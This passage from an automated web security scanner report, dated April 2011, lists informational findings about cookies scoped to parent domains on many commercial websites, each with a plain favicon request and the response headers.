Set-Cookie: TLTUID=2FD741865D2E105D041AB024DF96EAB9; Path=/; Domain=.hiexpress.com; expires=Sat, 02-04-2021 13:36:17 GMT
Set-Cookie: datacenternode=us-md-vz;domain=.hiexpress.com;path=/

...[SNIP]...

13.45. http://www.holidayinn.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.holidayinn.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.holidayinn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Thu, 11 Jun 2009 15:08:05 GMT
ETag: "3c877-47e-4a311dd5"
Accept-Ranges: bytes
Content-Length: 1150
Expires: Sat, 02 Apr 2011 13:33:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:33:20 GMT
Connection: close
Set-Cookie: TLTSID=C6463A385D2D105D01AFD68221F72F8C; Path=/; Domain=.holidayinn.com
Set-Cookie: TLTUID=C6463A385D2D105D01AFD68221F72F8C; Path=/; Domain=.holidayinn.com; expires=Sat, 02-04-2021 13:33:20 GMT
Set-Cookie: datacenternode=us-md-vz;domain=.holidayinn.com;path=/

...[SNIP]...

13.46. http://www.hsn.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hsn.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hsn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Wed, 23 Mar 2011 15:23:10 GMT
Accept-Ranges: bytes
ETag: "0c3ad376ee9cb1:1018"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=1AFFB8CF42502BFE5047CC8E8E254915; domain=.hsn.com; path=/
Set-Cookie: TLTHID=1AFFB8CF42502BFE5047CC8E8E254915; domain=.hsn.com; path=/
Date: Sat, 02 Apr 2011 13:35:57 GMT
Content-Length: 894

...[SNIP]...

13.47. http://www.ichotelsgroup.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ichotelsgroup.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ichotelsgroup.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Fri, 09 May 2008 23:45:44 GMT
ETag: "4158-57e-4824e228"
Accept-Ranges: bytes
Content-Length: 1406
Expires: Sat, 02 Apr 2011 13:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:37:25 GMT
Connection: close
Set-Cookie: TLTSID=587EC2EE5D2E105D0C7CAE80051D85A1; Path=/; Domain=.ichotelsgroup.com
Set-Cookie: TLTUID=587EC2EE5D2E105D0C7CAE80051D85A1; Path=/; Domain=.ichotelsgroup.com; expires=Sat, 02-04-2021 13:37:25 GMT

...[SNIP]...

13.48. http://www.imageshack.us/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imageshack.us
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.imageshack.us
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sat, 02 Apr 2011 13:31:41 GMT
Content-Type: image/x-icon
Content-Length: 1150
Last-Modified: Thu, 06 Aug 2009 00:27:03 GMT
Connection: close
Set-Cookie: is_uuid=8c73deec231e4ae196986744389ee358; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
X-Server-Name-And-Port: _:14000
Accept-Ranges: bytes

...[SNIP]...

13.49. http://www.know-where.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.know-where.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.know-where.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:48 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1301751948535439; path=/; domain=.Know-Where.com
Last-Modified: Mon, 26 Jan 2009 06:20:00 GMT
ETag: "16668e-e36-4615cba75a400"
Accept-Ranges: bytes
Content-Length: 3638
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:45:48 GMT
Content-Type: image/x-icon

...[SNIP]...

13.50. http://www.life123.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.life123.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.life123.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:46 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Set-Cookie: cu.wz=0; Domain=.life123.com; Expires=Sun, 01-Apr-2012 13:52:47 GMT; Path=/
Set-Cookie: wz_cu=0; Domain=.life123.com; Expires=Sun, 01-Apr-2012 13:52:47 GMT; Path=/
Set-Cookie: accepting=1; Domain=.life123.com; Expires=Sun, 01-Apr-2012 13:52:47 GMT; Path=/
Set-Cookie: user=l=dir; Domain=.life123.com; Path=/
Content-Length: 58228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Articles and Answers ab
...[SNIP]...

13.51. http://www.lingospot.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lingospot.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lingospot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: LUI=979b847691af299f; Path=/; Expires=Fri, 31-Dec-2015 23:59:59 GMT; Domain=.lingospot.com
Set-Cookie: LUI=8ac36f99936b606b; Path=/; Expires=Fri, 31-Dec-2015 23:59:59 GMT; Domain=.lingospot.com
Content-Type: text/html
Content-Length: 345
Date: Sat, 02 Apr 2011 14:04:58 GMT
Server: lighttpd/1.4.15

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

13.52. http://www.marykay.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.marykay.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 318
Content-Type: image/x-icon
Last-Modified: Thu, 10 Mar 2011 17:27:26 GMT
Accept-Ranges: bytes
ETag: "ef81c06c48dfcb1:b205e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=C7AF0F99472C520E98E3ADAFDE4C36B7; Path=/; Domain=.marykay.com
Set-Cookie: TLTSID=C7AF0F99472C520E98E3ADAFDE4C36B7; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS102
Date: Sat, 02 Apr 2011 14:18:35 GMT
Set-Cookie: www.marykay.com=537599148.20480.0000; expires=Sat, 09-Apr-2011 14:18:36 GMT; path=/

...[SNIP]...

13.53. http://www.mbnanetaccess.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mbnanetaccess.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mbnanetaccess.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:07:57 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=9C67422A5D32105D233AFD595FFC398E; Path=/; Domain=.mbnanetaccess.com
Set-Cookie: TLTUID=9C67422A5D32105D233AFD595FFC398E; Path=/; Domain=.mbnanetaccess.com; Expires=Sat, 02-04-2021 14:07:57 GMT
Content-Length: 209
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

13.54. http://www.metropcs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metropcs.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.metropcs.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: private
Content-Length: 29926
Content-Type: image/x-icon
Last-Modified: Wed, 30 Mar 2011 21:30:20 GMT
Accept-Ranges: bytes
ETag: "03e79ab21efcb1:0"
Set-Cookie: ObSSOCookie=auuIpgwyx1%2Bmw4aWg2EyflKn5s%2FrKmP9MXMdNQ7lQcFvhHjxf5%2FOq9vE6NP86tAKPXTepiWIEt%2BfE34ONiEac50naqF19H1jsmkcWUiKlGXMsTCflpbklJ9i9RiI0HJDY4%2BFRZ4FmP24MBvhkg2khWY0z9uRmu2l1mON8jQVqkKc3QXP4K9Ghp2bxsaZdMtnnSrj320WNcvwiKmeosLZmxL4yCOaO2p5PCsrggtrE5R%2FDssgDWmAam4%2Fgl48APqZdS9deMuxWaBos%2BcumL3pEP7Q1psil5WGDbY1RUNT14sdtUkRmiAQutC8BBzwW1bS5dXeD4NwSQqgU1SEIiRm5g%3D%3D; httponly; path=/; domain=.metropcs.com;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:51:32 GMT

...[SNIP]...

13.55. http://www.motortrend.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motortrend.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.motortrend.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nlyudv55a1nhnnmevhefti2i; path=/; HttpOnly
Set-Cookie: UserPuid=2319845640652462039; domain=motortrend.com; expires=Sat, 02-Apr-2061 13:50:29 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 414

...[SNIP]...

13.56. http://www.netflix.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netflix.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.netflix.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:42:59 GMT
Server: Apache-Coyote/1.1
Last-Modified: Thu, 24 Mar 2011 13:33:18 GMT
Content-Length: 1150
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/plain
Set-Cookie: NSC_ED2-xxx=ffffffff09cc3e9145525d5f4f58455e445a4a422d69;path=/;domain=netflix.com;httponly

...[SNIP]...

13.57. http://www.nintendo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nintendo.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nintendo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:59 GMT
Server: Apache
Set-Cookie: NINTENDO=173.193.214.243.1301753939577074; path=/; expires=Thu, 31-Mar-16 14:18:59 GMT; domain=.nintendo.com
Last-Modified: Wed, 22 Jul 2009 17:26:54 GMT
ETag: "2fe8b-e36-46f4ead643380"
Accept-Ranges: bytes
Content-Length: 3638
Cache-Control: max-age=2592000
Expires: Mon, 02 May 2011 14:18:59 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONo OTPa OUR SAMa NOR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE OTC", policyref="http://www.nintendo.com/w3c/p3p.xml"
NODE: swebe2
Content-Type: image/x-icon
Set-Cookie: BIGipServerWEB_NINTENDO=2052065290.20480.0000; path=/

...[SNIP]...

13.58. http://www.nytimes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nytimes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 12:43:13 GMT
Content-length: 1406
Content-type: image/x-icon
Set-cookie: RMID=0e1072ee0fa04d9719e1afa7; expires=Sunday, 01-Apr-2012 12:43:13 GMT; path=/; domain=.nytimes.com
Last-modified: Mon, 24 Mar 2008 16:03:01 GMT
Etag: "57e-47e7d0b5"
Accept-ranges: bytes

...[SNIP]...

13.59. http://www.officedepot.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.officedepot.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.officedepot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Length: 3978
Cache-Control: no-cache
Expires: Sat, 02 Apr 2011 13:39:10 GMT
Date: Sat, 02 Apr 2011 13:39:10 GMT
Connection: close
Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html class="nojs" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta h
...[SNIP]...

13.60. http://www.okcupid.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.okcupid.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.okcupid.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302
Date: Sat, 02 Apr 2011 13:40:27 GMT
Connection: close
Server: OKWS/3.1.7
Location: http://cdn.okcimg.com/_img/layout2/favicon_new.ico
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT", policyref="http://www.okcupid.com/w3c/p3p.xml"
Set-Cookie: guest=9282563596558295837; expires=Sun, 01 Apr 2012 13:40:27 GMT; path=/; domain=okcupid.com


13.61. http://www.pbs.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pbs.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pbs.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:24 GMT
Server: Apache/2.2.17 (Unix)
Set-Cookie: www.apache.sid=92e71d9857c8638d8750a317a271ed51; path=/; domain=.pbs.org
Last-Modified: Thu, 15 Nov 2001 16:43:13 GMT
ETag: "312715-1266-392cefa74aa40"
Accept-Ranges: bytes
Content-Length: 4710
Cache-Control: max-age=10368000
Expires: Sun, 31 Jul 2011 13:35:24 GMT
Content-Type: image/x-icon

...[SNIP]...

13.62. http://www.pizzahut.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pizzahut.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pizzahut.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Tue, 03 Mar 2009 19:15:15 GMT
Accept-Ranges: bytes
ETag: "b14e361349cc91:7d6"
X-Powered-By: ASP.NET
Content-Length: 1150
Cache-Control: max-age=73717
Date: Sat, 02 Apr 2011 13:36:41 GMT
Connection: close
Set-Cookie: WEBTRENDS_ID=6dce8f18f46000006926974d5fc705005eb80000; expires=Thu, 30-Dec-2010 18:50:11 GMT; path=/
Set-Cookie: www-origin=yeti-DC-WASHINGTON-511; path=/; domain=.pizzahut.com
Set-Cookie: www-origin-reset=1; expires=Mon, 02-May-2011 13:36:41 GMT; path=/; domain=.pizzahut.com

...[SNIP]...

13.63. http://www.playlist.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.playlist.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.playlist.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Sat, 02 Apr 2011 13:28:05 GMT
Content-Type: image/x-icon
Connection: keep-alive
Last-Modified: Wed, 16 Sep 2009 18:33:08 GMT
Accept-Ranges: bytes
Content-Length: 402
Vary: Accept-Encoding
Set-Cookie: nuid=CgABl02XJGVtzVZFFlaZAg==; expires=Sun, 01-Apr-12 13:28:05 GMT; domain=.playlist.com; path=/

...[SNIP]...

13.64. http://www.potterybarn.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.potterybarn.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.potterybarn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"1406-1301028802000"
Last-Modified: Fri, 25 Mar 2011 04:53:22 GMT
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8
Expires: Sat, 02 Apr 2011 13:56:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:56:58 GMT
Connection: close
Set-Cookie: PBDPWWW-EC=R4233321340; expires=Sun, 03-Apr-2011 14:02:10 GMT; domain=.potterybarn.com; path=/
Set-Cookie: WSPFY=179ed7406c5f00002a2b974dde5e000099500000; expires=Mon, 1-Jan-2024 00:00:01 GMT; path=/; domain=.potterybarn.com

...[SNIP]...

13.65. http://www.progressive.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.progressive.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.progressive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:02 GMT
Content-Type: image/x-icon
Content-Location: http://www.progressive.com/favicon.ico
Last-Modified: Mon, 14 Jul 2008 17:26:23 GMT
Accept-Ranges: bytes
ETag: "90e7f8bcd6e5c81:ca5"
Server: Microsoft-IIS/6.0
P3P: CP = "CUR ADM DEV TAI PSA PSD IVAo IVDo CONo OUR OTRo IND DSP COR CAO PHY ONL UNI PUR COM FIN NAV INT DEM CNT STA GOV OTC" policyref="http://www.progressive.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
Set-Cookie: SITESERVER=ID=e2d8848e783d41c387116140aecf48e2; path=/; domain=.progressive.com; expires=Sun, 31 Dec 2034 00:00:00 GMT
Set-Cookie: TLTSID=6E514838403FC7D968F3CB8A2A43E209; Domain=.progressive.com; path=/
Set-Cookie: TLTHID=6E514838403FC7D968F3CB8A2A43E209; Domain=.progressive.com; path=/
Set-Cookie: TLTUID=6E514838403FC7D968F3CB8A2A43E209; Domain=.progressive.com; path=/; expires=Sat, 02-04-2021 13:45:02 GMT
Content-Length: 10078

...[SNIP]...

13.66. http://www.qvc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qvc.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.qvc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
Location: /favicon.ico?&cookie=set
Content-Length: 0
Expires: Sat, 02 Apr 2011 13:36:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:36:24 GMT
Connection: close
Set-Cookie: site=IIS; domain=.qvc.com; path=/; expires=04-Apr-2011 12:00:00 EST
Set-Cookie: dc=IIS; domain=.qvc.com; path=/
Set-Cookie: cae_browser=desktop; expires=Sat, 02-Apr-2011 15:36:24 GMT; path=/; domain=.qvc.com


13.67. http://www.qwest.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qwest.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.qwest.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:27 GMT
Server: Apache
Set-Cookie: TLTHID=362214305D2E105D003BFDF5C24DBE16; Path=/; Domain=.qwest.com
Set-Cookie: TLTSID=362214305D2E105D003BFDF5C24DBE16; Path=/; Domain=.qwest.com
Last-Modified: Mon, 30 Mar 2009 13:45:20 GMT
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding,User-Agent
Content-Type: image/x-icon

...[SNIP]...

13.68. http://www.seniorpeoplemeet.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seniorpeoplemeet.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.seniorpeoplemeet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 5430
Content-Type: image/x-icon
Content-Location: http://www.seniorpeoplemeet.com/favicon.ico
Last-Modified: Thu, 03 Feb 2011 22:30:36 GMT
Accept-Ranges: bytes
ETag: "2a7e15faf1c3cb1:539"
Server: Microsoft-IIS/6.0
Date: Sat, 02 Apr 2011 14:09:06 GMT
Set-Cookie: NSC_QN-Tfojps=ffffffff09099c8d45525d5f4f58455e445a4a423660;Version=1;Max-Age=18000;path=/;domain=.seniorpeoplemeet.com;httponly

...[SNIP]...

13.69. http://www.sfgate.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sfgate.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sfgate.com
Accept: */*
Proxy-Connection: Keep-Alive

